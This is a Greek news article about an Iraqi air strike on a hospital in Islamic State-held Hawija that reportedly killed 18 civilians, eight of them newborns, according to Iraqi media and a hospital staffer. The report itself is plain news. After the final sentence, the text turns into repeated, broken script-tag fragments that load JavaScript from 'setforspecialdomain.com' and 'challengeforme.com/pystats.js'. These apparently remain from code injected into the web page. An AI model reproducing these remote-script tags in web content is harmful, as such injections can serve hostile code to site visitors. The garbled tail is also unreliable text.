8 νεογνά νεκρά έπειτα από βομβαρδισμό νοσοκομείου στο Ιράκ

Βομβαρδισμός νοσοκομείου στο Ιράκ με 18 νεκρούς

Ιρακινά πολεμικά αεροσκάφη έπληξαν νοσοκομείο στην πόλη Χαουίγια του βορείου Ιράκ που ελέγχεται από το Ισλαμικό Κράτος, ενώ στους 18 αμάχους που σκοτώθηκαν χθες περιλαμβάνονται οκτώ νεογνά, σύμφωνα με πληροφορίες που μετέδωσαν ιρακινά μέσα ενημέρωσης.

Για το συμβάν δεν υπάρχει επιβεβαίωση από επίσημη πηγή.

Τουλάχιστον 16 άνθρωποι τραυματίσθηκαν κατά τον βομβαρδισμό, δήλωσε στέλεχος του νοσοκομείου στην ανεξάρτητη ενημερωτική ιστοσελίδα Alsumaria News.

«Το κτίριο του νοσοκομείου υπέστη εκτεταμένες καταστροφής, ενώ η πτέρυγα των πρόωρων βρεφών κατέρρευσε», σύμφωνα με την ίδια πηγή.

«Κάτοικοι βοήθησαν στην ανάσυρση των ανθρώπων από τα ερείπια και στην μεταφορά των τραυματιών σε κοντινό νοσοκομείο», πρόσθεσε ο υπάλληλος που δεν κατονομάσθηκε.

Η πόλη Χαουίγια βρίσκεται κοντά στο Κιρκούκ και 250 χιλιόμετρα βορείως της Βαγδάτης.

Το Ισλαμικό Κράτος κατέλαβε την Χαουίγια τον Ιούνιο, όταν οι δυνάμεις των τζιχαντιστών προήλασαν αιφνιδιαστικά καταλαμβάνοντας μεγάλες περιοχές του βορείου Ιράκ.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >